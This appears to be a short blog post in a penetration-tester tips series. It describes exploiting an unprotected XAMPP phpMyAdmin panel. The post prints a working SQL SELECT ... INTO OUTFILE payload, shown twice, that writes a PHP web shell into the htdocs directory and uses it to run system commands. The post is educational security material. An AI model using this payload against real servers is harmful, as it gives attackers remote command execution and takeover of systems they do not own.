Tips for an Information Security Analyst/Pentester career - Ep. 29: XAMPP and SQL exploitation
I mentioned already in one my latest posts that it's possible to access MyPhpAdmin panel from Xampp without a password.
However, for time constraints, I didn't show you what you can actually do, by running SQL commands on it.
This time I'm gonna delve more into this topic.
So, let's access MyPhpAdmin panel like we did last time.
The first command I want to run is SHOW DATABASES; to retrieve all databases created on Xampp.
It doesn't return us anything very juicy.
The most dangerous vulnerability we can exploit this way, though, is uploading a PHP shell by using SQL syntax.
I could have easily used a reverse shell, but it was easier to just upload a shell that can run system commands when invoked.
For this, I used the following syntax:
SELECT "<?php system($_GET['cmd']); ?>" into outfile"C:\\xampp\\htdocs\\shell.php".
SELECT "<?php system($_GET['cmd']); ?>" into outfile"C:\\xampp\\htdocs\\shell.php".
This allows to enter PHP commands and to store them to a PHP file, that will be created in the web server directory (which, in Windows, is C:\xampp\htdocs, while in UNIX/Linux is /opt/lampp/htdocs).
In other words, it allows to create a PHP shell on the server by using SQL commands (a SELECT statement).
When we recall the shell and enter a system command, it'll be displayed in our browser.
Below is the result returned by running the netstat command.
You can easily understand the scary security implications from all this.
I could have very easily uploaded a reverse PHP shell and completely taken over the server.
It's that easy.
Thank you for your time.
Comments
Post a Comment